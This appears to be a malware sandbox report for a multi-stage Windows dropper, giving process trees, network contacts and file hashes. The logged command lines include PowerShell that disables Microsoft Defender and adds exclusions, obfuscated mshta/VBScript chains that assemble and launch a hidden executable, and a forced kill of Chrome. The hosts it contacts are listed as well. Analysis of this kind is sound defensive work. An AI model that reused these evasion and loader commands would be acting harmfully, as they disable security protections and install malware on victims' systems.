PID 2844 wrote to memory of 2312 N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2844 wrote to memory of 2312 N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2844 wrote to memory of 2312 N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2844 wrote to memory of 2312 N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2844 wrote to memory of 2312 N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2844 wrote to memory of 2088 N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2844 wrote to memory of 2088 N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2844 wrote to memory of 2088 N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2844 wrote to memory of 2088 N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2844 wrote to memory of 2088 N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2844 wrote to memory of 2088 N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2844 wrote to memory of 2088 N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2844 wrote to memory of 2372 N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2844 wrote to memory of 2372 N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2844 wrote to memory of 2372 N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2844 wrote to memory of 2372 N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2844 wrote to memory of 2372 N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2844 wrote to memory of 2372 N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2844 wrote to memory of 2372 N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2844 wrote to memory of 980 N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2844 wrote to memory of 980 N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2844 wrote to memory of 980 N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2844 wrote to memory of 980 N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2844 wrote to memory of 980 N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2844 wrote to memory of 980 N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2844 wrote to memory of 980 N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2188 wrote to memory of 2092 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat14f1396dfcf191bd.exe

Processes

C:\Users\Admin\AppData\Local\Temp\e31548b85abb75e70ead38c8788ca2f92d2ad1139a12f854280d1b4c866133ef.exe

"C:\Users\Admin\AppData\Local\Temp\e31548b85abb75e70ead38c8788ca2f92d2ad1139a12f854280d1b4c866133ef.exe"

C:\Users\Admin\AppData\Local\Temp\setup_installer.exe

"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"

C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\setup_install.exe

"C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\setup_install.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat14f1396dfcf191bd.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat142b09ae40c44cf.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat14514904a4b.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat14d32a38896785b13.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat14febbc433.exe /mixone

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat142ac5249376e895.exe

C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat14f1396dfcf191bd.exe

Sat14f1396dfcf191bd.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat1487ca754e680f91.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat144474a564d26f29.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat14b47e86b9c16b.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat1427fbafcf251.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat1481f5a7e3eccdd.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat14a7594cc5a0116.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable

C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat14d32a38896785b13.exe

Sat14d32a38896785b13.exe

C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat14febbc433.exe

Sat14febbc433.exe /mixone

C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat14514904a4b.exe

Sat14514904a4b.exe

C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat1481f5a7e3eccdd.exe

Sat1481f5a7e3eccdd.exe

C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat144474a564d26f29.exe

Sat144474a564d26f29.exe

C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat1487ca754e680f91.exe

Sat1487ca754e680f91.exe

C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat14b47e86b9c16b.exe

Sat14b47e86b9c16b.exe

C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat142ac5249376e895.exe

Sat142ac5249376e895.exe

C:\Users\Admin\AppData\Local\Temp\is-75P4F.tmp\Sat1481f5a7e3eccdd.tmp

"C:\Users\Admin\AppData\Local\Temp\is-75P4F.tmp\Sat1481f5a7e3eccdd.tmp" /SL5="$801E6,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat1481f5a7e3eccdd.exe"

C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat142b09ae40c44cf.exe

Sat142b09ae40c44cf.exe

C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat1427fbafcf251.exe

Sat1427fbafcf251.exe

C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat14a7594cc5a0116.exe

Sat14a7594cc5a0116.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1868 -s 276

C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat1481f5a7e3eccdd.exe

"C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat1481f5a7e3eccdd.exe" /SILENT

C:\Users\Admin\AppData\Local\Temp\is-AOB5K.tmp\Sat1481f5a7e3eccdd.tmp

"C:\Users\Admin\AppData\Local\Temp\is-AOB5K.tmp\Sat1481f5a7e3eccdd.tmp" /SL5="$301D6,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat1481f5a7e3eccdd.exe" /SILENT

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" vbsCRIPT: cLOsE (CreaTEobject ( "wscRiPT.sHELl" ). rUN ( "cmD.EXE /C TYPe ""C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat142b09ae40c44cf.exe"" > JYCWewAX2vPOJ.EXE && stArT JyCwewAX2vPOJ.eXe /p~P_UpSUZjMkOKsY & If """" == """" for %f iN ( ""C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat142b09ae40c44cf.exe"" ) do taskkill -iM ""%~NXf"" /f " , 0 , tRUe) )

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2844 -s 468

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C TYPe "C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat142b09ae40c44cf.exe" > JYCWewAX2vPOJ.EXE && stArT JyCwewAX2vPOJ.eXe /p~P_UpSUZjMkOKsY & If "" == "" for %f iN ( "C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat142b09ae40c44cf.exe" ) do taskkill -iM "%~NXf" /f

C:\Users\Admin\AppData\Local\Temp\JYCWewAX2vPOJ.EXE

JyCwewAX2vPOJ.eXe /p~P_UpSUZjMkOKsY

C:\Windows\SysWOW64\taskkill.exe

taskkill -iM "Sat142b09ae40c44cf.exe" /f

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" vbsCRIPT: cLOsE (CreaTEobject ( "wscRiPT.sHELl" ). rUN ( "cmD.EXE /C TYPe ""C:\Users\Admin\AppData\Local\Temp\JYCWewAX2vPOJ.EXE"" > JYCWewAX2vPOJ.EXE && stArT JyCwewAX2vPOJ.eXe /p~P_UpSUZjMkOKsY & If ""/p~P_UpSUZjMkOKsY "" == """" for %f iN ( ""C:\Users\Admin\AppData\Local\Temp\JYCWewAX2vPOJ.EXE"" ) do taskkill -iM ""%~NXf"" /f " , 0 , tRUe) )

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C TYPe "C:\Users\Admin\AppData\Local\Temp\JYCWewAX2vPOJ.EXE" > JYCWewAX2vPOJ.EXE && stArT JyCwewAX2vPOJ.eXe /p~P_UpSUZjMkOKsY & If "/p~P_UpSUZjMkOKsY " == "" for %f iN ( "C:\Users\Admin\AppData\Local\Temp\JYCWewAX2vPOJ.EXE" ) do taskkill -iM "%~NXf" /f

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" vbSCriPT: CLOSe (CReAteoBject ( "wSCRiPt.SHeLL" ). Run ( "CmD.exE /Q /R EcHO Soy%TimE%jk> 1hsQZ.62D &ecHO | sEt /P = ""MZ"" >PajLCM.4 & CoPy /Y /b PAjlCM.4 + lKYqBUE.m + VUR_hcMP.3T + U9bIUq0J.~DW + I5glXU.Q + 9h1gI_nY.T + 1HSQZ.62D 2KSA.Gf7 & STaRT msiexec -y .\2KSA.GF7 " , 0 , truE ) )

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /Q /R EcHO Soy%TimE%jk> 1hsQZ.62D &ecHO | sEt /P = "MZ" >PajLCM.4& CoPy /Y /b PAjlCM.4 + lKYqBUE.m + VUR_hcMP.3T + U9bIUq0J.~DW + I5glXU.Q + 9h1gI_nY.T + 1HSQZ.62D 2KSA.Gf7 & STaRT msiexec -y .\2KSA.GF7

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" ecHO "

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" sEt /P = "MZ" 1>PajLCM.4"

C:\Windows\SysWOW64\msiexec.exe

msiexec -y .\2KSA.GF7

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c taskkill /f /im chrome.exe

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im chrome.exe

C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat1427fbafcf251.exe

C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat1427fbafcf251.exe

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}

Network

Country Destination Domain Proto
US 8.8.8.8:53 marianu.xyz udp
NL 45.133.1.107:80 tcp
NL 45.133.1.107:80 tcp
US 8.8.8.8:53 gcl-gb.biz udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 www.listincode.com udp
US 8.8.8.8:53 iplogger.org udp
US 172.67.74.161:443 iplogger.org tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 c.pki.goog udp
US 8.8.8.8:53 ppgggb.com udp
US 8.8.8.8:53 cdn.discordapp.com udp
GB 142.250.200.3:80 c.pki.goog tcp
US 8.8.8.8:53 niemannbest.me udp
US 162.159.134.233:443 cdn.discordapp.com tcp
N/A 127.0.0.1:49296 tcp
N/A 127.0.0.1:49298 tcp
US 8.8.8.8:53 all-mobile-pa1ments.com.mx udp
US 8.8.8.8:53 buy-fantasy-football.com.sg udp
US 8.8.8.8:53 topniemannpickshop.cc udp
US 8.8.8.8:53 www.iyiqian.com udp
SG 13.251.16.150:80 www.iyiqian.com tcp
NL 194.104.136.5:46013 tcp
NL 45.9.20.13:80 tcp
NL 194.104.136.5:46013 tcp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 pastebin.com udp
US 172.67.19.24:443 pastebin.com tcp
US 8.8.8.8:53 wfsdragon.ru udp
US 104.21.5.208:80 wfsdragon.ru tcp
US 104.20.4.235:443 pastebin.com tcp
FR 51.178.186.149:80 tcp
US 172.67.74.161:443 iplogger.org tcp
US 172.67.74.161:443 iplogger.org tcp
US 104.21.5.208:80 wfsdragon.ru tcp
FR 51.178.186.149:80 tcp
NL 45.9.20.13:80 tcp
NL 194.104.136.5:46013 tcp
US 8.8.8.8:53 www.microsoft.com udp
NO 96.6.17.223:80 www.microsoft.com tcp
NL 45.9.20.13:80 tcp
NL 194.104.136.5:46013 tcp
NL 194.104.136.5:46013 tcp
NL 194.104.136.5:46013 tcp
NL 45.9.20.13:80 tcp
NL 194.104.136.5:46013 tcp
NL 45.9.20.13:80 tcp
NL 194.104.136.5:46013 tcp
NL 194.104.136.5:46013 tcp

Files

\Users\Admin\AppData\Local\Temp\setup_installer.exe

MD5 c12fe256228c8c0403ef35279aca6f58
SHA1 840a4eaf832f3cd154f0766dbc415a32c181e200
SHA256 86271c0587581b77766414a1238238011c10a5a06255b4611ac3b058f4529c2b
SHA512 88689761f0eeedc4ff633744dab15b26ad7352bda1f0329ed920dce463118ea11a14249cfd636aa3d39dbdabbcb1342138b7b5255a3791faf8ad955c63f5ff11

\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\setup_install.exe

MD5 47a5d34f871487a79975e5586e63ebdd
SHA1 75f4f1708c2b0a6433f8c0fa6ff47799115b2d2f
SHA256 884c76e10ef7f202b677c0ccfb6e9e009ca79e7189e76509a6449b5f8c2a952f
SHA512 3f96662af4937647a78a0a51cb4916f56ee250ab14094ed608344d727489eb0135b4016a73853ca1f96b165fbe9ac7957adb1cc884fff55cea837f668b157d04

\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\libwinpthread-1.dll

MD5 1e0d62c34ff2e649ebc5c372065732ee
SHA1 fcfaa36ba456159b26140a43e80fbd7e9d9af2de
SHA256 509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723
SHA512 3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61

\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\libcurlpp.dll

MD5 e6e578373c2e416289a8da55f1dc5e8e
SHA1 b601a229b66ec3d19c2369b36216c6f6eb1c063e
SHA256 43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f
SHA512 9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89

memory/2844-63-0x000000006B280000-0x000000006B2A6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\libcurl.dll

MD5 d09be1f47fd6b827c81a4812b4f7296f
SHA1 028ae3596c0790e6d7f9f2f3c8e9591527d267f7
SHA256 0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e
SHA512 857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595

C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\libgcc_s_dw2-1.dll

MD5 9aec524b616618b0d3d00b27b6f51da1
SHA1 64264300801a353db324d11738ffed876550e1d3
SHA256 59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e
SHA512 0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0

memory/2844-68-0x000000006B440000-0x000000006B4CF000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\libstdc++-6.dll

MD5 5e279950775baae5fea04d2cc4526bcc
SHA1 8aef1e10031c3629512c43dd8b0b5d9060878453
SHA256 97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87
SHA512 666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02

memory/2844-74-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2844-83-0x000000006B280000-0x000000006B2A6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat14febbc433.exe

MD5 4d255e96e5056f2c899884babcc55691
SHA1 44caeb1df6288c94081b805ee17f66db34dc7834
SHA256 e7678a0537796c6199bbc7fc5c143b475280564558250df218d62012c3b98506
SHA512 ad2cebd784a525d3fe2e3523c4f3d2ab793da84811a41b08aae99141d9c53f545b180d36f05647ddef04bba200b6a0fc917e481913f3b2b0162c136ec8355c44

C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat14514904a4b.exe

MD5 bdbbf4f034c9f43e4ab00002eb78b990
SHA1 99c655c40434d634691ea1d189b5883f34890179
SHA256 2da3696e82b2a874191a6f4e3bfd26d4b7e5aa5d187c5afdebbe52263dccd5ae
SHA512 dc3e513ad8cbb887652660603ce76437c6d3670637a99c1145c08fa23de658a5c5ca395cc8a2532de7b73302e88e0e8f1c026c4bb1b23481a3a5bb2dc92a68ec

C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat14d32a38896785b13.exe

MD5 148c3657379750b2fe7237ac1b06f507
SHA1 c464da9412a32ab71cd62491405296672c7ba3ad
SHA256 41a780cbf232d3ed4912406bdbb084f61c9faf56dcc0a7a81381546689170c64
SHA512 360588010bda2d3d514508fe9f2f95f63ca7a78476e24043985c350814c54f25c1f60c45e68e4431c2301f90b4092f88866624b12eb637145403592e7218d6bc

memory/1232-150-0x0000000000400000-0x00000000004BD000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-AOB5K.tmp\Sat1481f5a7e3eccdd.tmp

MD5 9303156631ee2436db23827e27337be4
SHA1 018e0d5b6ccf7000e36af30cebeb8adc5667e5fa
SHA256 bae22f27c12bce1faeb64b6eb733302aff5867baa8eed832397a7ce284a86ff4
SHA512 9fe100fafb1c74728109667b5a2261a31e49c45723de748adaa1d9cb9f8daa389b871056c70066fa3a05be82a5017c8dd590ae149a56d824a9e250d31091a40f

memory/2816-144-0x0000000000400000-0x0000000000414000-memory.dmp

memory/1936-153-0x00000000001B0000-0x00000000001B8000-memory.dmp

memory/2092-152-0x0000000000D00000-0x0000000000D18000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat14a7594cc5a0116.exe

MD5 492fe12bd7a2ea0ba1d2a5672f5a013a
SHA1 934a18ff3f83a43ce8c4a3cacba0d30d82c4276c
SHA256 45e13af971ea12864fd315f67096d0547bee1e07994f16bfedba10ca5beaad0f
SHA512 de5c99a7e20949bcd75bde8d971b343a6bae5255b5d46dd9472fde13ab0c3b4ce317eaf44527f79a113e2bd0b0efb0d19a5a53834e9b28a41b4885a888bcfd67

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\2G1DNHR7U492AU516ATI.temp

MD5 18d2e86178612aae3237795a235d2363
SHA1 efdd3baee5e982c359af8b77460351a6027586c0
SHA256 f366aa0b4f5fc79aa6ba1fb7774eaa536f81a6a719228a9c490f3c74eefbc920
SHA512 2cf5b8d966a7d46927bf2c4b6bedf058ebc45ada92317e13885f9965a6c0728d3c1f78e646c555b3ca9296ff814c13127c92aac2490aa9efa9e8cc7f63057b01

C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat1427fbafcf251.exe

MD5 8e0abf31bbb7005be2893af10fcceaa9
SHA1 a48259c2346d7aed8cf14566d066695a8c2db55c
SHA256 2df6cc430475ae053ad2772a3a9d1de1a03af31c3ebfdd0e5d5bd7fbdc61866a
SHA512 ba76470f4896e6bdac508e6a901b352a3bf731ab5680b9931cc1a8c874482cf0c19a374a6a58dda5237178c1861509529a5174bf76fa768efac7989dbc1c1970

\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat142ac5249376e895.exe

MD5 91e3bed725a8399d72b182e5e8132524
SHA1 0f69cbbd268bae2a7aa2376dfce67afc5280f844
SHA256 18af3c7bdeb815af9abe9dcc4f524b2fb2a33ac9cc6784f31e302c10a8d09a0d
SHA512 280fe25f4813bc261dee3b38ad03364896f3b4f049dcf1d94c6c6e7abb09b47e06445746719d902281d04cc15879d745dd0b71a466fa31f952ae51f90360ae76

memory/1808-155-0x0000000000400000-0x0000000000414000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-44TK9.tmp\_isetup\_shfoldr.dll

MD5 92dc6ef532fbb4a5c3201469a5b5eb63
SHA1 3e89ff837147c16b4e41c30d6c796374e0b8e62c
SHA256 9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87
SHA512 9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3

C:\Users\Admin\AppData\Local\Temp\is-44TK9.tmp\idp.dll

MD5 b37377d34c8262a90ff95a9a92b65ed8
SHA1 faeef415bd0bc2a08cf9fe1e987007bf28e7218d
SHA256 e5a0ad2e37dde043a0dd4ad7634961ff3f0d70e87d2db49761eb4c1f468bb02f
SHA512 69d8da5b45d9b4b996d32328d3402fa37a3d710564d47c474bf9e15c1e45bc15b2858dbab446e6baec0c099d99007ff1099e9c4e66cfd1597f28c420bb50fdcc

C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat1487ca754e680f91.exe

MD5 b4c503088928eef0e973a269f66a0dd2
SHA1 eb7f418b03aa9f21275de0393fcbf0d03b9719d5
SHA256 2a95ce43c87b8a26be71a459eae796a572422bd99cf0b9a3580a3a68e7dbd1a2
SHA512 c6fe2e2b5fbf9348701d1721f2b7ac7589b04b0308ae152e3a7186692b14f35e55bc7eed0c94a03031837b6f2b6aa4dc8d094aefce02913f1fbc4dedea452465

\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat144474a564d26f29.exe

MD5 962b4643e91a2bf03ceeabcdc3d32fff
SHA1 994eac3e4f3da82f19c3373fdc9b0d6697a4375d
SHA256 d2671668c6b2c9da5d319e60dea54361a2cbb362e46628cf0dccb5ff0baf786b
SHA512 ef6f4a5ccfff09506c925003ac49837d771787028fddcf2183e98cba2794df375fd0d5099e36abf8fedfc0dddd10ad076d2fc69a77b8ffd8180215b5cfc88dfd

memory/1808-114-0x0000000000400000-0x0000000000414000-memory.dmp

\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat14b47e86b9c16b.exe

MD5 77666d51bc3fc167013811198dc282f6
SHA1 18e03eb6b95fd2e5b51186886f661dcedc791759
SHA256 6a3d44d750ba258b1854431d89db135abc5d543ada1b384c5306e98031b8f1c9
SHA512 a024f008567a7417fe975063f661a0b278fb70c7576a7453e482f2e3f5c6cc48b5faaa55ec197e3082626faaa3598c9ff7bcca798ba7a1408bf666e61fdf4cd0

C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat1481f5a7e3eccdd.exe

MD5 9b07fc470646ce890bcb860a5fb55f13
SHA1 ef01d45abaf5060a0b32319e0509968f6be3082f
SHA256 506c6ee68b29701403739da25679b640d21b1b121f45dde5bc25705901a6ed0b
SHA512 4cc1b725c6fb539d832d2d5315bbc63e967a41129d25c2102b2df19e4931e4e06c2a9f70a3336d98b9e031c636d021e713f10dbbd86a57f447a7581221a470cc

C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat14f1396dfcf191bd.exe

MD5 15c6dc87edd001c0bf0df6f9405ad7db
SHA1 9582017cd83642ffdac143daeed13e840f4b2350
SHA256 5e7a5af6e0cea11934feaa716867e906644eb20df743b1c5fa85558de0c1b10d
SHA512 6fffd09475af31c9cdc56f561c13921975c236c6590ede369e5d863469452a6224d2ee9550d9f73fb65696c9d46185e487bf0764922c95831882a8029151603f

C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat142b09ae40c44cf.exe

MD5 a1d90c2ea649aae4d9492b584c52ef5c
SHA1 32969454090b6dd84a9b97d19bd58845cda5aae6
SHA256 64f7fc506342b8fd9bf09d45a012f9c996237e06cffbade5d3aedb1c8d967023
SHA512 09bf2aa523933dc05fb23a6d97f56ba33ba5894667b62f2275a4e94b86e9ac82d6faeda7dfdc0ac1c966fe13b0be29ae98158850d815021bd88837a3453b6e73

memory/2844-82-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/2844-81-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2844-79-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2844-78-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2844-77-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/2844-76-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/2844-75-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/2844-80-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2092-166-0x00000000001C0000-0x00000000001C6000-memory.dmp

memory/1724-173-0x0000000000E60000-0x0000000000EC8000-memory.dmp

memory/1868-182-0x0000000000400000-0x0000000000883000-memory.dmp

memory/1392-186-0x00000000023A0000-0x0000000002548000-memory.dmp

memory/2844-203-0x000000006EB40000-0x000000006EB63000-memory.dmp

memory/2844-204-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2844-202-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/2844-201-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/2844-200-0x0000000064940000-0x0000000064959000-memory.dmp

memory/2844-199-0x0000000000400000-0x000000000051C000-memory.dmp

memory/924-205-0x0000000000400000-0x000000000089C000-memory.dmp

memory/2844-214-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2844-213-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/2844-212-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/2844-210-0x000000006EB40000-0x000000006EB63000-memory.dmp

memory/2844-207-0x0000000064940000-0x0000000064959000-memory.dmp

memory/2844-206-0x0000000000400000-0x000000000051C000-memory.dmp

memory/2816-218-0x0000000000400000-0x0000000000414000-memory.dmp

memory/1524-219-0x0000000000400000-0x00000000004BD000-memory.dmp

memory/1836-220-0x0000000000400000-0x000000000041E000-memory.dmp

memory/1836-222-0x0000000000400000-0x000000000041E000-memory.dmp

memory/1836-232-0x0000000000400000-0x000000000041E000-memory.dmp

memory/1836-230-0x0000000000400000-0x000000000041E000-memory.dmp

memory/1836-229-0x0000000000400000-0x000000000041E000-memory.dmp

